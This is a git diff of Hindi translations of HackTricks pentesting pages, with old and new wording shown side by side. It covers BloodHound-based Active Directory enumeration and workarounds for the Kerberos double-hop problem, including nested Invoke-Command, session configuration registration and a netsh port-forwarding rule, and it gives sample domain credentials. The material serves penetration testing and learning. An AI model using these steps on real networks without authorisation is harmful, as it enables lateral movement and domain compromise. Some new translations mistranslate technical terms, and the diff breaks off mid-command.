यदि आप अलग प्रमाणीकरण (credentials) का उपयोग करके SharpHound चलाना चाहते हैं, तो आप CMD netonly सेशन बना सकते हैं और वहां से SharpHound चला सकते हैं: यदि आप विभिन्न क्रेडेंशियल का उपयोग करके SharpHound को निष्पादित करना चाहते हैं तो आप एक CMD netonly सत्र बना सकते हैं और वहां से SharpHound चला सकते हैं:
``` ```
runas /netonly /user:domain\user "powershell.exe -exec bypass" runas /netonly /user:domain\user "powershell.exe -exec bypass"
``` ```
[**ired.team पर Bloodhound के बारे में और जानें।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux) [**आईआरईडी टीम में ब्लडहाउंड के बारे में अधिक जानें।**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
## पुराना Bloodhound ## पुराना ब्लडहाउंड
### स्थापना ### स्थापना
1. Bloodhound 1. ब्लडहाउंड
विज़ुअलाइज़ेशन एप्लिकेशन स्थापित करने के लिए आपको **neo4j** और **bloodhound एप्लिकेशन** स्थापित करने की आवश्यकता होगी।\ दृश्यीकरण एप्लिकेशन स्थापित करने के लिए आपको **नेओ4जे** और **ब्लडहाउंड एप्लिकेशन** स्थापित करने की आवश्यकता ह।\
इसे करने का सबसे आसान तरीका है: इसे करने का सबसे आसान तरीका यह है:
``` ```
apt-get install bloodhound apt-get install bloodhound
``` ```
आप **neo4j का कम्युनिटी वर्जन डाउनलोड कर सकते हैं** [यहाँ से](https://neo4j.com/download-center/#community). आप **नियो4ज की समुदाय संस्करण** को [यहाँ से](https://neo4j.com/download-center/#community) डाउनलोड कर सकते हैं।
1. इन्जेस्टर्स 1. इजेस्टर्स
आप इन्जेस्टर्स यहाँ से डाउनलोड कर सकते हैं: आप इंजेस्टर्स को निम्नलिखित स्थान से डाउनलोड कर सकते हैं:
* https://github.com/BloodHoundAD/SharpHound/releases * https://github.com/BloodHoundAD/SharpHound/releases
* https://github.com/BloodHoundAD/BloodHound/releases * https://github.com/BloodHoundAD/BloodHound/releases
@ -102,24 +89,24 @@ apt-get install bloodhound
1. ग्राफ से पथ सीखें 1. ग्राफ से पथ सीखें
Bloodhound में विभिन्न क्वेरीज़ होती हैं जो संवेदनशील समझौता पथ को उजागर करती हैं। इसमें कस्टम क्वेरीज़ जोड़ना संभव है ताकि खोज और ऑब्जेक्ट्स के बीच संबंधों को बेहतर बनाया जा सके! Bloodhound विभिन्न क्वेरी के साथ आता है जो संवेदनशील कम्प्रोमाइस पथ को हाइलाइट करने के लिए है। यह संभावना है कि आप खोज और वस्तुओं के बीच संबंध को बढ़ाने के लिए कस्टम क्वेरी जोड़ सकते हैं!
इस रेपो में क्वेरीज़ का अच्छा संग्रह है: https://github.com/CompassSecurity/BloodHoundQueries इस रेपो में क्यूरीज का एक अच्छा संग्रह है: https://github.com/CompassSecurity/BloodHoundQueries
इंस्टालेशन प्रक्रिया: स्थापना प्रक्रिया:
``` ```
$ curl -o "~/.config/bloodhound/customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/BloodHound_Custom_Queries/customqueries.json" $ curl -o "~/.config/bloodhound/customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/BloodHound_Custom_Queries/customqueries.json"
``` ```
### विज़ुअलाइज़ेशन ऐप निष्पाद ### विज़ुअलाइज़ेशन एप्लिकेशन क्रियान्वय
आवश्यक एप्लिकेशन्स को डाउनलोड/इंस्टॉल करने के बाद, आइए उन्हें शुरू करें।\ आवश्यक एप्लिकेशनों को डाउनलोड/स्थापित करने के बाद, उन्हें शुरू करें।\
सबसे पहले आपको **neo4j डेटाबेस को शुरू करना होगा**: सबसे पहले, आपको **नियो4ज डेटाबेस शुरू करना होगा**:
```bash ```bash
./bin/neo4j start ./bin/neo4j start
#or #or
service neo4j start service neo4j start
``` ```
पहली बार जब आप इस डेटाबेस को शुरू करेंगे, आपको [http://localhost:7474/browser/](http://localhost:7474/browser/) पर जाना होगा। आपसे डिफ़ॉल्ट क्रेडेंशियल्स (neo4j:neo4j) पूछे जाएंगे और आपसे **पासवर्ड बदलने की आवश्यकता होगी**, इसलिए इसे बदलें और इसे भूलें नहीं। पहली बार जब आप इस डेटाबेस को शुरू करेंगे तो आपको [http://localhost:7474/browser/](http://localhost:7474/browser/) तक पहुंचने की आवश्यकता होगी। आपसे डिफ़ॉल्ट क्रेडेंशियल्स (neo4j:neo4j) की मांग की जाएगी और आपको **पासवर्ड बदलना अनिवार्य होगा**, इसलिए उसे बदल दें और उसे भूल न जाएं।
अब, **bloodhound एप्लिकेशन** शुरू करें: अब, **bloodhound एप्लिकेशन** शुरू करें:
```bash ```bash
@ -127,37 +114,38 @@ service neo4j start
#or #or
bloodhound bloodhound
``` ```
आपसे डेटाबेस क्रेडेंशियल्स के लिए पूछा जाएगा: **neo4j:\<आपका नया पासवर्ड>** आपसे डेटाबेस क्रेडेंशियल के लिए पूछा जाएगा: **neo4j:\<आपका नया पासवर्ड>**
और bloodhound डेटा इनजेस्ट करने के लिए तैयार होगा। और bloodhound डेटा इनजेस्ट करने के लिए तैयार हो जाएगा।
![](<../../.gitbook/assets/image (171) (1).png>) ![](<../../.gitbook/assets/image (171) (1).png>)
### **Python bloodhound** ### **Python bloodhound**
यदि आपके पास डोमेन क्रेडेंशियल्स हैं तो आप किसी भी प्लेटफॉर्म से **python bloodhound ingestor चला सकते हैं** इसलिए आपको Windows पर निर्भर नहीं हना पड़ेगा।\ अगर आपके पास डोमेन क्रेडेंशियल हैं तो आप किसी भी प्लेटफॉर्म से **पायथन ब्लडहाउंड इंजेस्टर चला सकते हैं** ताकि आपको Windows पर निर्भर नहीं हना पड़े।\
इसे [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) से डाउनलोड करें या `pip3 install bloodhound` करे। इसे [https://github.com/fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) से डाउनलोड करें या `pip3 install bloodhound` करे
```bash ```bash
bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
``` ```
यदि आप इसे proxychains के माध्यम से चला रहे हैं तो DNS समाधान को प्रॉक्सी के माध्यम से काम करने के लिए `--dns-tcp` जोड़ें। यदि आप इसे प्रॉक्सीचेन्स के माध्यम से चला रहे हैं तो DNS संक्षेप काम करने के लिए `--dns-tcp` जोड़ें।
```bash ```bash
proxychains bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all --dns-tcp proxychains bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all --dns-tcp
``` ```
### Python SilentHound ### Python SilentHound
यह स्क्रिप्ट **Active Directory Domain को LDAP के माध्यम से शांतिपूर्वक सूचीबद्ध करेगी**, जिसमें उपयोगकर्ताओं, व्यवस्थापकों, समूहों आदि का विश्लेषण होता है यह स्क्रिप्ट **LDAP के माध्यम से Active Directory डोमेन को शांति से जांचेगा** और उपयोगकर्ताओं, व्यवस्थापकों, समूह आदि को पार्स करेगा
इसे [**SilentHound github**](https://github.com/layer8secure/SilentHound) पर देखें। इसे देखें [**SilentHound github**](https://github.com/layer8secure/SilentHound).
### RustHound ### RustHound
BloodHound in Rust, [**यहाँ जांचें**](https://github.com/OPENCYBER-FR/RustHound)। Rust में BloodHound, इसे [**यहाँ देखें**](https://github.com/OPENCYBER-FR/RustHound).
## Group3r ## Group3r
[**Group3r**](https://github.com/Group3r/Group3r) **** एक उपकरण है जो Active Directory से जुड़ी **Group Policy** में **भेद्यताओं** का पता लगाता है। \ [**Group3r**](https://github.com/Group3r/Group3r) **** एक उपकरण है जो Active Directory से संबंधित **समूह नीति** में **कमजोरियों** को खोजने के लिए है। \
आपको डोमेन के अंदर के किसी भी होस्ट से **group3r चलाना होगा** **किसी भी डोमेन उपयोगकर्ता** का उपयोग करते हुए आपको **किसी भी डोमेन उपयोगकर्ता** का उपयोग करके डोमेन के भीतर से **ग्रुप3r चलाना** होगा
```bash ```bash
group3r.exe -f <filepath-name.log> group3r.exe -f <filepath-name.log>
# -s sends results to stdin # -s sends results to stdin
@ -165,18 +153,6 @@ group3r.exe -f <filepath-name.log>
``` ```
## PingCastle ## PingCastle
[**PingCastle**](https://www.pingcastle.com/documentation/) **AD पर्यावरण की सुरक्षा स्थिति का मूल्यांकन करता है** और ग्राफ़ के साथ एक अच्छी **रिपोर्ट** प्रदान करता है। ****[**PingCastle**](https://www.pingcastle.com/documentation/) **एडी वातावरण की सुरक्षा स्थिति का मूल्यांकन करता है** और एक अच्छी **रिपोर्ट** प्रदान करता है जिसमें ग्राफ शामिल हैं
इसे चलाने के लिए, आप `PingCastle.exe` बाइनरी को निष्पादित कर सकते हैं और यह विकल्पों के मेनू के साथ एक **इंटरैक्टिव सत्र** शुरू करेगा। उपयोग करने के लिए डिफ़ॉल्ट विकल्प **`healthcheck`** है जो **डोमेन** का एक बेसलाइन **अवलोकन** स्थापित करेगा, और **गलत कॉन्फ़िगरेशन** और **कमजोरियों** का पता लगाएगा। इसे चलाने के लिए, `PingCastle.exe` नामक बाइनरी को चला सकते हैं और यह एक **इंटरैक्टिव सत्र** शुरू करेगा जिसमें विकल्पों का एक मेनू प्रस्तुत किया जाएगा। उपयोग करने के लिए डिफ़ॉल्ट विकल्प **`healthcheck`** है जो **डोमेन** का एक मूल **अवलोकन** स्थापित करेगा, और **misconfigurations** और **वंलरेबिलिटीज़** को खोजेगा।&#x20;
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुँच प्राप्त करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**
</details>

File diff suppressed because one or more lines are too long

View file

@ -4,11 +4,11 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**। * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>

View file

@ -2,69 +2,69 @@
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**. * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके अपना योगदान दें** * **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
## परिचय ## परिचय
केरबेरोस "डबल हॉप" समस्या उत्पन्न होती है जब एक हमलावर को दो **हॉप** के माध्यम से केरबेरोस प्रमाणीकरण का उपयोग करने की कोशिश करता है, उदाहरण के लिए **PowerShell**/**WinRM** का उपयोग करके। केरबेरोस "डबल हॉप" समस्या उत्पन्न होती है जब एक हमलावर दो **हॉप** के माध्यम से **केरबेरोस प्रमाणीकरण का उपयोग** करने का प्रयास करता है, उदाहरण के लिए **PowerShell**/**WinRM** का उपयोग करके।
जब केरबेरोस के माध्यम से **प्रमाणीकरण** होता है, तो **क्रेडेंशियल्स** को **मेमोरी में कैश नहीं किया जाता है।** इसलिए, यदि आप mimikatz चलाते हैं तो आपको मशीन में उपयो्ता के क्रेडेंशियल्स नहीं मिलेंगे, भले ही वह प्रक्रियाएँ चला रहा हो। जब **केरबेरोस** के माध्यम से **प्रमाणीकरण** होता है, **क्रेडेंशियल** **मेमोरी में कैश नहीं** होती हैं। इसलिए, यदि आप mimikatz चलाते हैं तो आपको प्रयोक्ता के क्रेडेंशियल मशीन में नहीं मिलेंगे भले ही वह प्रक्रियाएँ चला रहा हो।
यह इसलिए है क्योंकि केरबेरोस के साथ कनेक्ट करते समय ये कदम होते हैं: यह इसलिए है क्योंकि केरबेरोस के साथ कनेक्ट करते समय ये कदम होते हैं:
1. पयो्ता 1 क्रेडेंशियल्स प्रदान करता है और **डोमेन कंट्रोलर** उपयोगकर्ता 1 को केरबेरोस **TGT** वापस करता है। 1. प्रयोक्ता1 क्रेडेंशियल प्रदान करता है और **डोमेन कंट्रोलर** प्रयोक्ता1 को एक केरबेरोस **TGT** लौटाता है।
2. पयो्ता 1 **TGT** का उपयोग करके **सर्विस टिकट** का अनुरोध करता है **सर्वर 1** से कनेक्ट होने के लिए। 2. प्रयोक्ता1 **TGT** का उपयोग करके **सेवा टिकट** का अनुरोध करता है **सर्वर1** से **कनेक्ट** होने के लिए।
3. उपयोगकर्ता 1 **सर्वर 1** से कनेक्ट होता है और **सर्विस टिकट** प्रदान करता है। 3. प्रयोक्ता1 **सर्वर1** से **कनेक्ट** करता है और **सेवा टिकट** प्रदान करता है।
4. **सर्वर 1** में पयो्ता 1 के **क्रेडेंशियल्स** या **TGT** नहीं होते हैं। इसलिए, जब सर्वर 1 से उपयोगकर्ता 1 दूसरे सर्वर में लॉगिन करने की कोशिश करता है, वह **प्रमाणीकरण करने में सक्षम नहीं होता है** 4. **सर्वर1** में प्रयोक्ता1 के **क्रेडेंशियल** या **TGT** नहीं होते हैं। इसलिए, जब प्रयोक्ता1 सर्वर1 से दूसरे सर्वर में लॉगिन करने का प्रयास करता है, वह **प्रमाणीकरण** नहीं कर पाता है
### असीमित डिलीगेश ### असीमित अनुबंध
यदि PC में **असीमित डिलीगेशन** सक्षम है, तो ऐसा नहीं होगा क्योंकि **सर्वर** को उसे एक उपयोगकर्ता के **TGT** मिलेगा जो उसे उपयोग कर रहा है। इसके अलावा, यदि असीमित डिलीगेशन का उपयोग किया जाता है, तो आप शायद इससे **डोमेन कंट्रोलर को संक्रमित** कर सकते हैं।\ यदि PC में **असीमित अनुबंधन** सक्षम है, तो यह नहीं होगा क्योंकि **सर्वर** को उसे एक भी उपयोगकर्ता का **TGT** मिलेगा जो इसे एक्सेस कर रहा है। इसके अतिरिक्त, यदि असीमित अनुबंधन का उपयोग किया जाता है तो आप शायद इससे **डोमेन कंट्रोलर** को **कंप्रोमाइज** कर सकते हैं।\
[**असीमित डिलीगेशन पृष्ठ में अधिक जानकारी**](unconstrained-delegation.md). [**असीमित अनुबंधन पृष्ठ में अधिक जानकारी**](unconstrained-delegation.md)
### CredSSP ### CredSSP
इस समस्या से बचने के लिए **सिस्टम व्यवस्थापकों** के लिए एक और सुझाव दिया जाता है जो [**अत्यंत असुरक्षित**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) है, वह है **Credential Security Support Provider (CredSSP)**। CredSSP को सक्षम करने का समाधान विभिन्न फोरमों पर वर्षों से उल्लेखित किया गया है। माइक्रोसॉफ्ट के अनुसार: इस समस्या से बचने के लिए **सिस्टम व्यवस्थापकों** के लिए एक और सुझाव जो [**विशेष रूप से असुरक्षित है**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) है **क्रेडेंशियल सुरक्षा समर्थन प्रदाता**। CredSSP को सक्षम करना वर्षों से विभिन्न फोरमों में उल्लेखित समाधान रहा है। माइक्रोसॉफ्ट से:
_"CredSSP प्रमाणीकरण स्थानीय कंप्यूटर से दूसरे कंप्यूटर को उपयोगकर्ता क्रेडेंशियल्स अनुप्रेषित करता है। इस अभ्यास से दूरस्थ कंप्यूटर की सुरक्षा जोखिम बढ़ जाता है। यदि दूरस्थ कंप्यूटर प्रभावित हो जाता है, तो जब क्रेडेंशियल्स उसे पास किए जाते हैं, तो क्रेडेंशियल्स का उपयोग नेटवर्क सत्र को नियंत्रित करने के लिए किया जा सकता है।"_ _“CredSSP प्रमाणीकरण स्थानीय कंप्यूटर से दूरस्थ कंप्यूटर को उपयोगकर्ता क्रेडेंशियल अनुप्रेषित करता है। यह अभ्यास दूरस्थ संचालन का सुरक्षा जोखिम बढ़ाता है। यदि दूरस्थ कंप्यूटर को कंप्रोमाइज़ किया जाता है, जब क्रेडेंशियल उसे पारित किए जाते हैं, तो क्रेडेंशियल का उपयोग नेटवर्क सत्र को नियंत्रित करने के लिए किया जा सकता है।_
यदि आप प्रोडक्शन सिस्टमों, संवेदनशील नेटवर्कों आदि पर **CredSSP सक्षम** पाते हैं, तो उन्हें अक्षम करना सिफारिश किया जाता है। CredSSP स्थिति की जांच करने का एक त्वरित तरीका है `Get-WSManCredSSP` चलाना। जो दूरस्थता में निष्पादित किया जा सकता है यदि WinRM सक्षम है। यदि उत्पादन सिस्टमों, संवेदनशील नेटवर्क आदि पर **CredSSP सक्षम** पाए जाते हैं, तो सुझाव दिया जाता है कि उन्हें अक्षम किया जाए। CredSSP स्थिति की जांच करने का एक त्वरित तरीका है `Get-WSManCredSSP` चलाकर। जो दूरस्थ से निष्क्रिय किया जा सकता है यदि WinRM सक्षम है।
```powershell ```powershell
Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock { Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
Get-WSManCredSSP Get-WSManCredSSP
} }
``` ```
## उपाय ## कार्यारूपण
### Invoke Command <a href="#invoke-command" id="invoke-command"></a> ### आवाज़ कमांड <a href="#invoke-command" id="invoke-command"></a>
यह विधि दोहरी हॉप समस्या के साथ काम करने की तरह है, न कि इसे हल करने की तरह। इसमें कोई कॉन्फ़िगरेशन की आवश्यकता नहीं होती है, और आप इसे आसानी से अपने हमलावर बॉक्स से चला सकते हैं। यह मूल रूप से एक **नेस्टेड `Invoke-Command`** है। यह विधि दोहरी हॉप समस्या के साथ काम करने की तरह है, जिसे आवश्यकता नहीं है। इसमें कोई विन्यास नहीं है, और आप इसे आसानी से अपने हमले वाले बॉक्स से चला सकते हैं। यह मूल रूप से एक **नेस्टेड `Invoke-Command`** है।
यह **दूसरे सर्वर पर `hostname` चलाएगा:** यह **दूसरे सर्वर पर `hostname`** चलाएगा:
```powershell ```powershell
$cred = Get-Credential ta\redsuit $cred = Get-Credential ta\redsuit
Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock { Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock {
Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname} Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
} }
``` ```
आपके पास पहले सर्वर के साथ एक **PS-Session** स्थापित किया जा सकता है और बस वहां से `$cred` के साथ **`Invoke-Command`** चला सकते हैं इसे नेस्ट करने की बजाय। हालांकि, इसे अपने हमलावर बॉक्स से चलाने से कार्य केंद्रीकृत होता है: आप एक **PS-Session** को **पहले सर्वर** के साथ स्थापित कर सकते हैं और बस वहां से **`Invoke-Command`** को `$cred` के साथ **चला** सकते हैं इसे नेस्ट करने की बजाय। हालांकि, अपने हमलावार बॉक्स से इसे चलाना कार्यक्षमता को केंद्रीकृत करता है:
```powershell ```powershell
# From the WinRM connection # From the WinRM connection
$pwd = ConvertTo-SecureString 'uiefgyvef$/E3' -AsPlainText -Force $pwd = ConvertTo-SecureString 'uiefgyvef$/E3' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd) $cred = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
# Use "-Credential $cred" option in Powerview commands # Use "-Credential $cred" option in Powerview commands
``` ```
### पीएससेशन कॉन्फ़िगरेशन पंजीकृत करें ### रजिस्टर PSSession Configuration
यदि आप **`evil-winrm`** की बजाय **`Enter-PSSession`** कमांडलेट का उपयोग कर सकते हैं, तो आप फिर से जुड़कर डबल हॉप समस्या को टाल सकते हैं। इसके लिए **`Register-PSSessionConfiguration`** का उपयोग करें: यदि **`evil-winrm`** का उपयोग न करके आप **`Enter-PSSession`** cmdlet का उपयोग कर सकते हैं तो आप फिर **`Register-PSSessionConfiguration`** का उपयोग करके डबल हॉप समस्या को अनदखा करने के लिए पुनः कनेक्ट कर सकते हैं:
```powershell ```powershell
# Register a new PS Session configuration # Register a new PS Session configuration
Register-PSSessionConfiguration -Name doublehopsess -RunAsCredential domain_name\username Register-PSSessionConfiguration -Name doublehopsess -RunAsCredential domain_name\username
@ -76,59 +76,51 @@ Enter-PSSession -ConfigurationName doublehopsess -ComputerName <pc_name> -Creden
klist klist
# In this session you won't have the double hop problem anymore # In this session you won't have the double hop problem anymore
``` ```
### पोर्ट फॉरवर्डिंग <a href="#portproxy" id="portproxy"></a> ### पोर्ट फॉरवर्डिंग <a href="#portproxy" id="portproxy"></a>
चूंकि हमारे पास इंटरमीडिएट टारगेट **bizintel: 10.35.8.17** पर स्थानीय प्रशासक है, आप एक पोर्ट फॉरवर्डिंग नियम जोड़कर अपने अनुरोधों को अंतिम/तीसरे सर्वर **secdev: 10.35.8.23** पर भेज सक हैं। क्योंकि हमारे पास इंटरमीडिएट टारगेट **bizintel: 10.35.8.17** पर स्थानीय प्रशासक है, आप एक पोर्ट फॉरवर्डिंग नियम जोड़ सकते हैं ताकि आपके अनुरोध अंतिम/तीसरे सर्वर **secdev: 10.35.8.23** पर भेजे जा सकें।
आप एक वन-लाइनर निकालने और नियम जोड़ने के लिए त्वरित रूप से **netsh** का उपयोग कर सकते हैं। **netsh** का उपयोग करके आप एक वन-लाइनर निकालकर नियम जोड़ सकते हैं।
```bash ```bash
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23 netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
``` ```
तो **पहली सर्वर** पोर्ट 5446 पर सुन रही है और 5446 पर आने वाले अनुरोधों को **दूसरे सर्वर** पोर्ट 5985 (यानी WinRM) पर आगे भेजेगी इसलिए **पहला सर्वर** पोर्ट 5446 पर सुन रहा है और 5446 पर पहुंचने वाले अनुरोधों को **दूसरे सर्वर** पोर्ट 5985 (यानी WinRM) पर फॉरवर्ड करेगा
फिर Windows फ़ायरवॉल में एक छेद बनाएं, जिसे एक तेज़ netsh one-liner के साथ भी किया जा सकता है। फिर Windows फ़ायरवॉल में एक होल बनाएं, जिसे एक तेज netsh one-liner के साथ भी किया जा सकता है।
```bash ```bash
